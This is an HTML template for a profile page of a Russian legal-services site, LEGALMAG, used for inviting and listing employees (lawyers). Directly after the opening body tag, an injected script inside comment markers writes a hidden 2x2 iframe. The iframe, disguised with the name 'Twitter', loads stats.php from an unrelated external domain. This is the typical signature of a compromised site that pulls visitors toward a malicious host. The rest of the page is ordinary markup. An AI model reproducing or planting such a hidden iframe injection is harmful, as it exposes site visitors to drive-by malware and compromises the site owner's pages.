<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<title>LEGALMAG</title>

	<link rel="stylesheet" href="design/css/style.css">
	<!--[if IE 7]><link rel="stylesheet" href="design/css/style_ie7.css" /><![endif]-->
	<!--[if IE 8]><link rel="stylesheet" href="design/css/style_ie8.css" /><![endif]-->
	<!--[if IE 9]><link rel="stylesheet" href="design/css/style_ie9.css" /><![endif]-->
	<link rel="stylesheet" href="design/css/jquery-ui-1.8.20.custom.css">
	<link rel="stylesheet" href="design/css/jquery.ui.selectmenu.css">
	<link rel="stylesheet" href="design/css/jquery.fancybox.css">

	<script src="design/js/jquery-1.7.2.min.js"></script>
	<!--[if lt IE 9]><script src="design/js/html5.js"></script><![endif]-->
	<script src="design/js/custom.js"></script>
</head>

<body><!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://cabaniaseleden.com.ar/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->


	<section id="body">
		<header><!--header-->
			<div class="wrapper">
				<a id="logo" href="index.html" title="LEGALMAG"></a>
				<div id="social-enter">Войти через: <img src="design/images/social-login.jpg" alt=""></div>
				<div id="logged">
					Привет,&nbsp;<a class="enter" href="">Валентин!</a>
					<a class="register" href="">Выйти</a>
					<div class="sep"></div>
				</div>
				<nav class="auth"><!--top-navigation-->
					<ul>
						<li><a href="">Лента вопросов</a></li>
						<li><a href="">Каталог</a></li>
						<li class="active"><a href="">Личный кабинет</a></li>
						<li ><a href="">Вопросы и ответы</a></li>
						<li><a href="">Как это работает?</a></li>
					</ul>
				</nav><!--/top-navigation-->
			</div>
		</header><!--/header-->

		<div class="clear">&nbsp;</div>

		<section id="content"><!--content-->
			<div class="wrapper">
				<aside id="left-profile">
					<div id="userIn">
						<div class="img"><img src="design/images/company.jpg" alt=""></div>
						<p>Правовой центр Анктор</p>
						<p class="myMessages"><a href="">Мои сообщения</a> (<span>3</span>)</p>
					</div>
					<div id="profile">
						<div class="profile">
							<ul>
								<li><a href="">Редактировать профиль</a>
									<ul>
										<li><a href="">Личная информация</a></li>
										<li><a href="">Образование и работа</a></li>
										<li><a href="">Контатная информация</a></li>
										<li><a href="">Услуги</a></li>
										<li><a href="">Настройка оповещений</a></li>
										<li class="active">Сотрудники</li>
										<li><a href="">Рекламная компания</a></li>
									</ul>
								</li>
								<li class="back"><a href="">Назад</a></li>
							</ul>
						</div>
						<div class="leftSay"></div>
					</div>
				</aside>
				<section id="right-profile">
					<div class="wrapper">
						<div class="head">Редактировать профиль</div>
						<div class="personalInfo wide">
							<form>
								<p class="title">Пригласите ваших сотрудников на сайт</p>
								<input type="text" class="inviteEmpoyee" placeholder="Имя">
								<input type="text" class="inviteEmpoyee" placeholder="Фамилия">
								<input type="email" class="inviteEmpoyee" placeholder="E-mail">
								<input type="text" class="inviteEmpoyee" placeholder="Имя">
								<input type="text" class="inviteEmpoyee" placeholder="Фамилия">
								<input type="email" class="inviteEmpoyee" placeholder="E-mail">
								<input type="text" class="inviteEmpoyee" placeholder="Имя">
								<input type="text" class="inviteEmpoyee" placeholder="Фамилия">
								<input type="email" class="inviteEmpoyee" placeholder="E-mail">
								<p class="inviteCaption">Пожалуйста, введите в поля выше имя, фамилию и адрес электронной почты пользователя, которого вы хотите добавить на сайт. Мы вышлем ему пригласителя.</p>
								<div class="buttonAddBlock">
									<label for="buttonAdd" class="buttonAdd">Добавить еще одного сотрудника</label><input type="submit" id="buttonAdd" value="">
								</div>
								<div class="buttonHolder10"><input type="submit" class="buttonSave" value="Пригласить"></div>
							</form>
							<form>
								<p class="title">Укажите сотрудников, уже зарегистрированных на сайте</p>
								<div class="registeredEmployee">
									<input type="email" placeholder="E-mail">
									<input type="text" placeholder="www.legalmag.ru/user">
									<input type="email" placeholder="E-mail">
									<input type="text" placeholder="www.legalmag.ru/user">
									<input type="email" placeholder="E-mail">
									<input type="text" placeholder="www.legalmag.ru/user">
								</div>
								<div class="clear">&nbsp;</div>
								<p class="inviteCaption">Пожалуйста, введите в поля адрес электронной почты пользователя, на который был зарегистрирован аккаунт в Legalmag или ссылку на профайл вашего сотрудника.</p>
								<div class="buttonAddBlock">
									<label for="buttonAdd" class="buttonAdd">Добавить еще одного сотрудника</label><input type="submit" id="buttonAdd" value="">
								</div>
								<div class="buttonHolder10"><input type="submit" class="buttonSave" value="Пригласить"></div>
							</form>
							<form>
								<p class="title">Ваши сотрудники</p>
								<div class="lawyer">
									<div class="left">
										<div class="img">
											<a href=""><img src="design/images/face.jpg" alt=""></a>
										</div>
										<a href="">Иванова Снежанна Нургалиевна</a>
										<div class="rating">
											<img src="design/images/stars.png" alt="">
										</div>
										<p>Местоположение: Москва</p>
										<p>Специализация: <a href="">семейное право</a></p>
									</div>
									<div class="right">
										<a class="delete" href="">Удалить сотрудника из списка</a>
									</div>
									<div class="clear">&nbsp;</div>
								</div>
								<div class="lawyer">
									<div class="left">
										<div class="img">
											<a href=""><img src="design/images/face.jpg" alt=""></a>
										</div>
										<a href="">Иванова Снежанна Нургалиевна</a>
										<div class="rating">
											<img src="design/images/stars.png" alt="">
										</div>
										<p>Местоположение: Москва</p>
										<p>Специализация: <a href="">семейное право</a></p>
									</div>
									<div class="right">
										<span class="deleted">Сотрудник удален из списка</span>
									</div>
									<div class="clear">&nbsp;</div>
								</div>
								<div class="lawyer">
									<div class="left">
										<div class="img">
											<a href=""><img src="design/images/face.jpg" alt=""></a>
										</div>
										<a href="">Иванова Снежанна Нургалиевна</a>
										<div class="rating">
											<img src="design/images/stars.png" alt="">
										</div>
										<p>Местоположение: Москва</p>
										<p>Специализация: <a href="">семейное право</a></p>
									</div>
									<div class="right">
										<a class="delete" href="">Удалить сотрудника из списка</a>
									</div>
									<div class="clear">&nbsp;</div>
								</div>
							</form>
						</div>
					</div>
				</section>
			</div>
		</section><!--/content-->

	<div class="clear">&nbsp;</div>
	<div id="rasporka"></div>

	</section><!--/body-wrapper-->

	<footer><!--footer-->
		<section class="wrapper">
			<div class="left-col">
				<p>&copy; Legalmag, 2012</p>
				<p>Все права защищены.</p>
				<p style="margin: 20px 0 5px 0;"><a href="">Условия использования</a></p>
				<a href="">Регламент техподдержки</a>
			</div>
			<div class="right-col">
				<nav>
					<ul>
						<li><a href="">О проекте </a></li>
						<li><a href="">Условия использования</a></li>
						<li class="active"><a href="">Для инвесторов</a></li>
						<li><a href="">Безопасность </a></li>
						<li><a href="">Контакты</a></li>
					</ul>
				</nav>
				<div id="paySystems"></div>
			</div>
		</section>
	</footer><!--/footer-->

</body>
</html>